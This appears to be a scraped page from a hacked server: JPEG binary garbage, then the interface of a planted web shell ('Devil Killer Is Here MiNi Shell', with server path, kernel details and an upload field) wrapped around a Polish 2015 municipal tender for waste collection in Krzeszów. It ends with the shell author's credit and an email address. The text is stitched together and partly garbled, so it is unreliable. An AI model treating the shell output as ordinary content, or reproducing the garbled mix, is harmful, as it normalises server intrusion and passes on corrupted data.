JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151216/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151216/344142-N-2015.html

<p class="kh_header"><b>Krzeszów: Odbiór i zagospodarowanie odpadów komunalnych z terenu gminy Krzeszów w roku 2016</b><br>
<b>Numer ogłoszenia: 344142 - 2015; data zamieszczenia: 16.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Krzeszów , Rynek 2, 37-418 Krzeszów, woj. podkarpackie, tel. 015 8798351, faks 015 8798254.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.krzeszow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór i zagospodarowanie odpadów komunalnych z terenu gminy Krzeszów w roku 2016.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> III. OPIS PRZEDMIOTU ZAMÓWIENIA
1. Przedmiotem zamówienia jest świadczenie usługi w zakresie odbioru, transportu 
i zagospodarowania odpadów komunalnych od właścicieli nieruchomości zamieszkałych na terenie Gminy Krzeszów.

2.   Szczegółowy opis przedmiotu zamówienia:
1)	 Załadunek, transport i unieszkodliwianie zmieszanych odpadów komunalnych  w Regionalnej Instalacji Przetwarzania Odpadów Komunalnych dla regionu północnego wskazanej w Wojewódzkim Planie Gospodarki Odpadami Województwa Podkarpackiego lub do Instalacji Zastępczej w przypadkach określonych w obowiązujących przepisach.

2)	 Zbiórka, transport i zagospodarowanie selektywnie zebranych odpadów od właścicieli  nieruchomości:
a) papier i tektura - w tym opakowania z papieru i tektury, gazety, czasopisma, opakowania  wielomateriałowe,
b) tworzywa sztuczne - w tym opakowania z tworzyw sztucznych,
c) metale - puszki, drobny złom,
d) szkło -  w tym opakowania ze szkła,
e) zużyty sprzęt elektryczny i elektroniczny,
f) odpady ulegające biodegradacji - w tym trawy, liście, rozdrobnione gałęzie,

3)	 Zbiórka, transport i zagospodarowanie odpadów 
a)	 odpady wielkogabarytowe, zużyte opony - zbiórka akcyjna w mobilnych punktach odbioru odpadów (12 punktów - po jednym na sołectwo)
b)	 odpady z aptek - przeterminowane leki (2 punkty na terenie Gminy Krzeszów)

4)	 Wyposażenie oraz prowadzenie Punktu Selektywnej Zbiórki Odpadów Komunalnych (PSZOK), w pojemniki pozwalające gromadzić następujące rodzaje odpadów: papier, tworzywa sztuczne, opakowania wielomateriałowe, zużyte opony, szkło, metal, chemikalia, zużyte akumulatory i baterie, zużyty sprzęt elektryczny i elektroniczny odpady wielkogabarytowe, odpady budowlane i rozbiórkowe (posegregowane), popiół, odpady ulegające biodegradacji i zielone. Do Wykonawcy będzie należał odbiór zgromadzonych tam odpadów (załadunek, transport, zagospodarowanie). Zamawiający  przewiduje, iż odpady odbierane będą co najmniej jeden raz na kwartał. Do porównania ofert, Wykonawca w cenie oferty winien uwzględnić  wyposażenie PSZOK w  5 sztuk pojemników - 1100l i 5 sztuk pojemników  7000l (KP-7). Pojemniki będą stanowić własność Wykonawcy. PSZOK winien być czynny co najmniej jeden dzień w tygodniu w godzinach 10:00 - 18:00

5)	 Dane dotyczące Gminy Krzeszów istotne z punktu widzenia zamówienia:
a) liczba mieszkańców zameldowanych według danych ewidencji ludności:
1)	w roku 2014 (stan na 31 grudnia 2014 r.) - 4 299 osób,
b) liczba nieruchomości zamieszkałych na terenie Gminy Krzeszów -  1050
c) szacunkowa łączna ilość odpadów komunalnych mających zostać odebranych, przetransportowanych i zagospodarowanych z terenu Gminy Krzeszów w okresie obowiązywania umowy ( 12 m-cy ) wynosi około 350 Mg - przedstawione wielkości odpadów komunalnych są wielkościami orientacyjnymi ustalonymi na podstawie iloczynu szacunkowo wytworzonych odpadów  oraz  szacunkowej liczby mieszkańców objętych usługą,  przyjętymi w celu porównania ofert i wyboru najkorzystniejszej oferty. Ustalone ilości mogą ulec zmianie stosownie do rzeczywistych potrzeb Zamawiającego uwzględniając ilość odpadów wytworzonych przez mieszkańców,
d) ilości zebranych odpadów w roku 2014 z podziałem na frakcje:
 
Lp.	Rok		Rodzaj odpadu			Masa odpadu
[Mg]	
						
	
1.	2014	Niesegregowane (zmieszane) odpady	239,7
		Papier, tektura, opakowania z papieru i tektury	2,9
		Szkło, opakowania ze szkła	31,9
		Metale, opakowania z metalu	7,6
		Tworzywa sztuczne, opakowania z tworzyw sztucznych	17,2
		Odpady budowlane i rozbiórkowe	7,7
		Odpady biodegradowalne	5,0
		Zużyty sprzęt elektryczny i elektroniczny	0,6
		Odpady wielkogabarytowe, zużyte opony	2,8

e) na podstawie powyższych danych Wykonawca ustali przewidywaną masę odpadów  komunalnych i na tej podstawie określi cenę ryczałtową za wykonanie usługi. Wykonawcy nie przysługuje prawo  do dodatkowego wynagrodzenia lub odszkodowania za osiągnięcie innej wielkości.

6) Odzysk i unieszkodliwianie odpadów komunalnych zebranych z zamieszkałych nieruchomości oraz z Punktu selektywnego zbierania odpadów komunalnych odbywać się winien zgodnie 
z ustawą o odpadach oraz ustawą o utrzymaniu czystości i porządku w gminach.
a) Wykonawca zobowiązany jest do osiągnięcia w danym roku kalendarzowym w odniesieniu do masy odebranych przez siebie odpadów komunalnych poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami papieru, metali, tworzyw sztucznych, szkła, innych niż niebezpieczne odpadów budowlanych i rozbiórkowych zgodnie z Rozporządzeniem Ministra Środowiska z dnia 29 maja 2012 r. w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych (Dz.U. z 2012r. poz. 645),
b) Wykonawca zobowiązany jest do osiągnięcia w danym roku kalendarzowym w odniesieniu do masy odebranych przez siebie odpadów komunalnych poziomów ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania z godnie Rozporządzeniem Ministra Środowiska z dnia 25 maja 2012 r. w sprawie poziomów ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania oraz sposobu obliczania poziomu ograniczania masy tych odpadów (Dz.U. z 2012r. poz. 676),  
c) W przypadku nieosiągnięcia poziomów, o których mowa w ppkt. a) i b) Wykonawca zwróci Zamawiającemu nałożone na niego kary za nieosiągnięcie tych poziomów. Określony obowiązek zwrotu Zamawiającemu nałożonych na niego kar z tytułu określonego w ppkt. a) i b) obciąża Wykonawcę również w przypadku, gdy kary te zostaną nałożone na Zamawiającego po zakończeniu przez Wykonawcę niniejszego zadania, a dotyczyć będą okresu realizacji przez Wykonawcę tego zadania.

7) Wykonawca zobowiązany jest do bieżącego prowadzenia ilościowej i jakościowej ewidencji odpadów zgodnie przepisami ustawy o odpadach oraz  ustawy o utrzymaniu czystości i porządku w gminach

8) Załadunek i transport odpadów będzie odbywał się za pomocą odpowiedniego sprzętu,  będącego w dyspozycji Wykonawcy odpowiadającego wymaganiom określonym 
w Rozporządzeniu  Ministra Środowiska z dnia 11 stycznia 2013r w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od  właścicieli nieruchomości (Dz.U. z 2013r. poz. 122).

9) Zamawiający zastrzega sobie prawo wglądu do systemu nadzorowania (GPS), Wykonawca zobowiązuje się na swój koszt  zainstalować u Zamawiającego niezbędne oprogramowanie 

10) Wykonawca nie może w trakcie odbioru i transportu mieszać odpadów gromadzonych 
w sposób selektywnie z odpadami zmieszanymi.

11) Przed rozpoczęciem wykonywania usługi Wykonawca zobowiązany jest sporządzić harmonogram świadczenia usług, który po zatwierdzeniu przez Zamawiającego należy dostarczyć w formie ulotki właścicielom  nieruchomości. Opracowany harmonogram musi być bezwzględnie przestrzegany. Harmonogram musi zawierać: terminy odbioru odpadów komunalnych dla poszczególnych miejscowości zmieszanych i zbieranych selektywnie, sposób segregacji poszczególnych frakcji odpadów komunalnych. Obowiązkiem  Wykonawcy jest aktualizowanie harmonogramu na wniosek Zamawiającego lub w miarę zaistniałych potrzeb - zawsze po uzyskaniu zgody  Zamawiającego.

12) Wymagana częstotliwość wywozu odpadów:

a)	 Odpady komunalne zbierane w sposób nieselektywny, będą odbierane wg harmonogramu ustalonego dla danej miejscowości - w okresie od kwietnia do sierpnia dwa razy w miesiącu, w okresie od września do marca nie rzadziej niż jeden raz 
w miesiącu 
b)	 Odpady komunalne zbierane w sposób selektywny (papier, tektura, metale, tworzywa sztuczne, szkło, opakowania wielomateriałowe), będą odbierane wg harmonogramu ustalonego dla danej miejscowości - w okresie od kwietnia do sierpnia dwa razy w miesiącu, w okresie od września do marca nie rzadziej niż jeden raz w miesiącu
c)	 Odpady komunalne: zużyty sprzęt elektryczny i elektroniczny, odpady wielkogabarytowe, zużyte opony - jeden raz w roku
d)	 Odpady ulegające biodegradacji - dwa razy w roku

13) Wykonawca zobowiązany jest dostarczyć i ustawić we wskazanych przez Zamawiającego punktach (aptekach), pojemniki do zbierania przeterminowanych lekarstw. Wykonawca zobowiązany jest po otrzymaniu informacji od zamawiającego, odebrać i zagospodarować 
odpady (przeterminowane lekarstwa) z tych punktów w terminie do 3 dni roboczych. 

14) Odpady komunalne odbierane od właścicieli nieruchomości przez przedsiębiorcę będą
        zagospodarowywane w następujący sposób: 
a) zmieszane odpady komunalne (nieselekcjonowane) wywożone będą do instalacji regionalnych lub instalacji zastępczych znajdujących się w regionie północnym województwa zgodnie z obowiązującymi przepisami; 
b) surowce wtórne pochodzące z selektywnej zbiórki dowożone będą do ponadregionalnych instalacji, lub do instalacji regionalnych lub instalacji zastępczych zgodnie z obowiązującymi przepisami. 
c) odpady zielone dowożone będą do instalacji regionalnej lub instalacji zastępczej znajdującej się w   regionie północnym, zgodnie z obowiązującymi przepisami. 
d) odpady niebezpieczne dowożone do punktu zbiórki znajdującego się na terenie gminy  przekazywane będą przedsiębiorcy a następnie unieszkodliwiane i zagospodarowywane zgodnie z obowiązującymi przepisami.

15) Wykonawca w ramach oferowanej ceny dostarczy właścicielom nieruchomości worki do selektywnej zbiórki odpadów. 
a) Worki powinny posiadać następujące kolory i pojemności:
 - niebieski - przeznaczony na papier, tekturę i opakowania wielomateriałowe - poj. 120 l
 - zielony - przeznaczony na szkło bezbarwne i kolorowe - poj. 80 l,
 - żółty - przeznaczony na tworzywa sztuczne - poj. 120 l,
 - czerwony - przeznaczony na metale - poj. 80 l
 - brązowy - przeznaczony na odpady biodegradowalne - poj. 80 l, 
b) Worki powinny spełniać następujące wymagania
 - materiał - folia polietylenowa,
 - pojemność - od 80l do 120l,
 - nadruk - oznaczenie rodzaju odpadów i nazwa przedsiębiorcy
c) Ilość worków do selektywnej zbiórki, które musi zapewnić Wykonawca : niebieski, zielony, żółty, czerwony, brązowy. musi być dostosowana do liczby obsługiwanych mieszkańców i wynikającej z harmonogramu częstotliwości ich odbierania przy założeniu braku limitu ilości odbieranych odpadów segregowanych
d) Wykonawca jest zobowiązany do dostarczenia worków do właścicieli nieruchomości po podpisaniu umowy, w terminie ustalonym z  Zamawiającym, po jednym na nieruchomość, następne  po odebraniu pełnego worka

16) Wykonawca ma obowiązek odbierania odpadów zmieszanych gromadzonych w workach i pojemnikach o pojemnikach o pojemności do 240 l będących własnością właścicieli nieruchomości, jeżeli spełniają one wymagania określone w Polskich Normach

17) Do obowiązków Wykonawcy należy kontrolowanie właścicieli nieruchomości pod kątem wypełniania zadeklarowanego obowiązku w zakresie selektywnego zbierania odpadów komunalnych oraz niezwłoczne informowanie Zamawiającego o przypadkach niedopełnienia przez właścicieli nieruchomości ww. obowiązku. Do informacji należy dołączyć dokumentację fotograficzną wraz z  datą wykonania.

18) Środki uzyskane ze sprzedaży selektywnie odebranych surowców wtórnych są dochodem Wykonawcy i powinny zostać uwzględnione w kalkulacji przy ustalaniu ceny za wykonywaną usługę.

19) Wykonawca jest zobowiązany do przedstawiania Zamawiającemu sprawozdań według wzoru 
i częstotliwości określonej w Rozporządzeniu Ministra Środowiska z dnia 15 maja 2012 r. 
w sprawie wzorów sprawozdań o odebranych odpadach komunalnych, odebranych nieczystościach ciekłych oraz realizacji zadań z zakresu gospodarowania odpadami komunalnymi (Dz. U. z 2012 r. poz. 630).
Przedmiot zamówienia musi być wykonany zgodnie z obowiązującymi przepisami prawa oraz warunkami i wymogami określonymi w Specyfikacji Istotnych Warunków Zamówienia.90.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.31.00-7, 90.50.00.00-2, 90.53.30.00-3, 90.51.40.00-3, 91.51.10.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>działalność prowadzona na potrzeby wykonania przedmiotu zamówienia wymaga posiadania 
a ) wpis do rejestru działalności regulowanej prowadzonej przez Wójta Gminy Krzeszów w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości zgodnie z wymogami ustawy z dnia 13 września 1996r o utrzymaniu czystości i porządku w gminach ( Dz.U. z 2012r, poz. 391 ), 
b) aktualne zezwolenie Starosty na prowadzenie działalności w zakresie transportu odpadów zgodnie z art.. 41 ustawy z dnia 14 grudnia 2012r o odpadach (Dz.U. z 2013r poz.21) obejmujące teren gminy Krzeszów -  ocena spełnienia  powyższego  warunku dokonana zostanie  na podstawie danych i informacji zawartych w przedłożonych przez Wykonawców dokumentach określonych w dziale VI niniejszej SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, ze warunek jest spełniony gdy Wykonawca oświadczy , że posiada wiedzę 
i doświadczenie do wykonania zamówienia - na potwierdzenie   spełnienia warunku  
Wykonawca składa  oświadczenie  z art. 22 ust.1 pkt.2,( zał. Nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, ze warunek jest spełniony gdy Wykonawca oświadczy , że dysponuje odpowiednim potencjałem technicznym  oraz osobami zdolnymi do wykonania zamówienia   - na potwierdzenie   spełnienia warunku Wykonawca składa  oświadczenie  z art. 22 ust.1 pkt. 3 ( zał. Nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, ze warunek jest spełniony gdy Wykonawca oświadczy , że dysponuje odpowiednim potencjałem technicznym  oraz osobami zdolnymi do wykonania zamówienia   - na potwierdzenie   spełnienia warunku Wykonawca składa  oświadczenie  z art. 22 ust.1 pkt. 3 ( zał. Nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ,że warunek jest spełniony gdy Wykonawca oświadczy, że znajduje się 
w sytuacji ekonomicznej i finansowej umożliwiającej wykonanie zamówienia, -  na potwierdzenie spełnienia  warunku  Wykonawca składa oświadczenie z art. 22 ust.1 pkt.4, (Zał. Nr 2 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 97</li>
<li>2 - termin płatności w zakresie od 14 do 45 dni - 3</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.krzeszow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Krzeszów, 37-418 Krzeszów, ul. Rynek 2, p. nr 12.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.12.2015 godzina 09:00, miejsce: Urząd Gminy Krzeszów, 37-418 Krzeszów, ul. Rynek 2, p. nr.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com